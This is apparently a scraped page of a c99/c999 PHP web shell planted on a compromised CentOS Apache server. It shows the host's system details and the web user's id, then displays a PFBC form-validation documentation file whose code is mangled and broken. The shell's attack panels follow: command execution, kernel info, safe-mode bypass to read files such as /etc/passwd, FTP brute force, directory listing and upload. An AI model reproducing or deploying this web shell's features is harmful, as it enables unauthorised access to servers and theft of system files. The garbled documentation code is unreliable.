!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/examples/   drwxr-xr-x
Free 52.41 GB of 127.8 GB (41.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     validation.php (14.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |




	
Validation





In PFBC, PHP validation is achieved in a two step process.  The first step is to apply 
validation rules to form elements via the element's validation property.  Some elements
including Captcha, Color, Date, Email, jQueryUIDate, Month, Number, Url, and Week have validation
rules applied by default.



Secondly, you need to call the Form class' isValid static method once the form's data has been submitted.
This function will return true/false.  If false is returned, it indicates that one or more errors
occurred.  You will then need to redirect users back to the form to correct and resubmit.  Here's an example
of the isValid method.






	


")) {
	/*The form\'s submitted data has been validated.  Your script can now proceed with any 
	further processing required.*/
}
else {
	header("Location: ");
	/*Validation errors have been found.  We now need to redirect back to the 
	script where your form exists so the errors can be corrected and the form
	re-submitted.*/
}');	
?>

	

	


")) {
	/*The form\'s submitted data has been validated.  Your script can now proceed with any 
	further processing required.*/
}
else {
	header("Location: ");
	/*Validation errors have been found.  We now need to redirect back to the 
	script where your form exists so the errors can be corrected and the form
	re-submitted.*/
}');	
?>

	


	


PFBC supports 8 types of validation rules: AlphaNumeric, Captcha, Date, Email, Numeric, RegExp, Required, and Url.  Here's
how they are applied to elements.


configure(array(
	"prevent" => array("bootstrap", "jQuery")
));
$form->addElement(new Element\Hidden("form", "validation"));
$form->addElement(new Element\Textbox("Require:", "Required", array(
	"required" => 1,
	"longDesc" => "The required property provides a shortcut for applying the Required class to the element's
	validation property.  If supported, the HTML5 required attribute will also provide client-side validation."
)));
$form->addElement(new Element\Textbox("Regular Expression:", "RegularExpression", array(
	"validation" => new Validation\RegExp("/pfbc/", "Error: The %element% field must contain following keyword - \"pfbc\"."),
	"longDesc" => "The RegExp validation class provides the means to apply custom validation to an element.  Its constructor 
	includes two parameters: the regular expression pattern to test and the error message to display if the pattern is not matched."
)));
$form->addElement(new Element\Email("Email:", "Email", array(
	"longDesc" => "The Email element applies the Email validation rule by default.  If supported, HTML5
	validation will also be provided client-side."
)));
$form->addElement(new Element\Number("Numeric:", "Numeric", array(
	"longDesc" => "The Number element applies the Numeric validation rule by default.  If supported, HTML5
	validation will also be provided client-side."
)));
$form->addElement(new Element\Url("Url:", "Url", array(
	"longDesc" => "The Url element applies the Url validation rule by default.  If supported, HTML5
	validation will also be provided client-side."
)));
$form->addElement(new Element\Date("Date:", "Date", array(
	"longDesc" => "The Date element applies the RegExp validation rule by default - ensuring the following date format YYYY-MM-DD
	is adhered to."
)));
$form->addElement(new Element\jQueryUIDate("", "Date2", array(
	"longDesc" => "The jQueryUIDate element applies the Date validation rule by default - ensuring the submitted value satisfies 
	PHP's DateTime class constructor."
)));
$form->addElement(new Element\Textbox("AlphaNumeric:", "AlphaNumberic", array(
	"validation" => new Validation\AlphaNumeric,
	"longDesc" => "The AlphaNumeric validation class will verify that the element's submitted value contains only letters, 
	numbers, underscores, and/or hyphens."
)));
$form->addElement(new Element\Captcha("Captcha:", array(
	"longDesc" => "The Captcha element applies the Captcha validation, which uses 
	reCaptcha's anti-bot service to reduce spam submissions."
)));
$form->addElement(new Element\Email("Multiple Rules:", "Email2", array(
	"validation" => new Validation\RegExp("/.*@gmail.com$/", "Error: The %element% field must contain a Gmail address."),
	"longDesc" => "Multiple validation rules can be attached to an element by passing the validation property an array of validation 
	class instances.  This Email element also applies the RegExp validation rule to ensure the supplied email address is from Gmail."
)));
$form->addElement(new Element\Button);
$form->addElement(new Element\Button("Cancel", "button", array(
	"onclick" => "history.go(-1);"
)));
$form->render();
?>





	


configure(array(
	"prevent" => array("bootstrap", "jQuery")
));
$form->addElement(new Element\Hidden("form", "validation"));
$form->addElement(new Element\Textbox("Require:", "Required", array(
	"required" => 1,
	"longDesc" => "The required property provides a shortcut for applying the Required class to the element\'s validation property.  If supported, the HTML5 required attribute will also provide client-side validation."
)));
$form->addElement(new Element\Textbox("Regular Expression:", "RegularExpression", array(
	"validation" => new Validation\RegExp("/pfbc/", "Error: The %element% field must contain following keyword - \"pfbc\"."),
	"longDesc" => "The RegExp validation class provides the means to apply custom validation to an element.  Its constructor includes two parameters: the regular expression pattern to test and the error message to display if the pattern is not matched."
)));
$form->addElement(new Element\Email("Email:", "Email", array(
	"longDesc" => "The Email element applies the Email validation rule by default.  If supported, HTML5 validation will also be provided client-side."
)));
$form->addElement(new Element\Number("Numeric:", "Numeric", array(
	"longDesc" => "The Number element applies the Numeric validation rule by default.  If supported, HTML5 validation will also be provided client-side."
)));
$form->addElement(new Element\Url("Url:", "Url", array(
	"longDesc" => "The Url element applies the Url validation rule by default.  If supported, HTML5 validation will also be provided client-side."
)));
$form->addElement(new Element\Date("Date:", "Date", array(
	"longDesc" => "The Date element applies the RegExp validation rule by default - ensuring the following date format YYYY-MM-DD is adhered to."
)));
$form->addElement(new Element\jQueryUIDate("", "Date2", array(
	"longDesc" => "The jQueryUIDate element applies the Date validation rule by default - ensuring the submitted value satisfies PHP\'s DateTime class constructor."
)));
$form->addElement(new Element\Textbox("AlphaNumeric:", "AlphaNumberic", array(
	"validation" => new Validation\AlphaNumeric,
	"longDesc" => "The AlphaNumeric validation class will verify that the element\'s submitted value contains only letters, numbers, underscores, and/or hyphens."
)));
$form->addElement(new Element\Captcha("Captcha:", array(
	"longDesc" => "The Captcha element applies the Captcha validation, which uses reCaptcha\'s anti-bot service to reduce spam submissions."
)));
$form->addElement(new Element\Email("Multiple Rules:", "Email2", array(
	"validation" => new Validation\RegExp("/.*@gmail.com$/", "Error: The %element% field must contain a Gmail address."),
	"longDesc" => "Multiple validation rules can be attached to an element by passing the validation property an array of validation class instances.  This Email element also applies the RegExp validation rule to ensure the supplied email address is from Gmail."
)));
$form->addElement(new Element\Button);
$form->addElement(new Element\Button("Cancel", "button", array(
	"onclick" => "history.go(-1);"
)));
$form->render();');
?>

	

	


configure(array(
    "prevent" => array("bootstrap", "jQuery")
));
$form->addElement(new Element_Hidden("form", "validation"));
$form->addElement(new Element_Textbox("Require:", "Required", array(
    "required" => 1,
    "longDesc" => "The required property provides a shortcut for applying the Required class to the element\'s validation property.  If supported, the HTML5 required attribute will also provide client-side validation."
)));
$form->addElement(new Element_Textbox("Regular Expression:", "RegularExpression", array(
    "validation" => new Validation_RegExp("/pfbc/", "Error: The %element% field must contain following keyword - \"pfbc\"."),
    "longDesc" => "The RegExp validation class provides the means to apply custom validation to an element.  Its constructor includes two parameters: the regular expression pattern to test and the error message to display if the pattern is not matched."
)));
$form->addElement(new Element_Email("Email:", "Email", array(
    "longDesc" => "The Email element applies the Email validation rule by default.  If supported, HTML5 validation will also be provided client-side."
)));
$form->addElement(new Element_Number("Numeric:", "Numeric", array(
    "longDesc" => "The Number element applies the Numeric validation rule by default.  If supported, HTML5 validation will also be provided client-side."
)));
$form->addElement(new Element_Url("Url:", "Url", array(
    "longDesc" => "The Url element applies the Url validation rule by default.  If supported, HTML5 validation will also be provided client-side."
)));
$form->addElement(new Element_Date("Date:", "Date", array(
    "longDesc" => "The Date element applies the RegExp validation rule by default - ensuring the following date format YYYY-MM-DD is adhered to."
)));
$form->addElement(new Element_jQueryUIDate("", "Date2", array(
    "longDesc" => "The jQueryUIDate element applies the Date validation rule by default - ensuring the submitted value satisfies PHP\'s DateTime class constructor."
)));
$form->addElement(new Element_Textbox("AlphaNumeric:", "AlphaNumberic", array(
    "validation" => new Validation_AlphaNumeric,
    "longDesc" => "The AlphaNumeric validation class will verify that the element\'s submitted value contains only letters, numbers, underscores, and/or hyphens."
)));
$form->addElement(new Element_Captcha("Captcha:", array(
    "longDesc" => "The Captcha element applies the Captcha validation, which uses reCaptcha\'s anti-bot service to reduce spam submissions."
)));
$form->addElement(new Element_Email("Multiple Rules:", "Email2", array(
    "validation" => new Validation_RegExp("/.*@gmail.com$/", "Error: The %element% field must contain a Gmail address."),
    "longDesc" => "Multiple validation rules can be attached to an element by passing the validation property an array of validation class instances.  This Email element also applies the RegExp validation rule to ensure the supplied email address is from Gmail."
)));
$form->addElement(new Element_Button);
$form->addElement(new Element_Button("Cancel", "button", array(
    "onclick" => "history.go(-1);"
)));
$form->render();');
?>

	


	



Custom Validation


Often times, you'll find that you need to apply custom validation to your forms' submitted data.  For instance, if you create a login
form, you'll need to validate user entered credentials against your system.  PFBC has several methods that support this type of scenario.
Let's take a look at an example implementation.






	




	

	




	


	


The isValid method has a second, optional parameter that controls whether or not the form's submitted data is cleared from the PHP session
if the form validates without errors.  In the example above, false is passed allowing us to authenticate the potential user with
the fictional isValidUser function.  If the user's credentials are valid, the session data is cleared manually with the clearValues method,
and we redirect the user to their profile page.  If invalid credentials were supplied, we use the setError method to manually set a custom
error message and redirect back to the login form so the user can resubmit.


bool(false)

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.006 ]--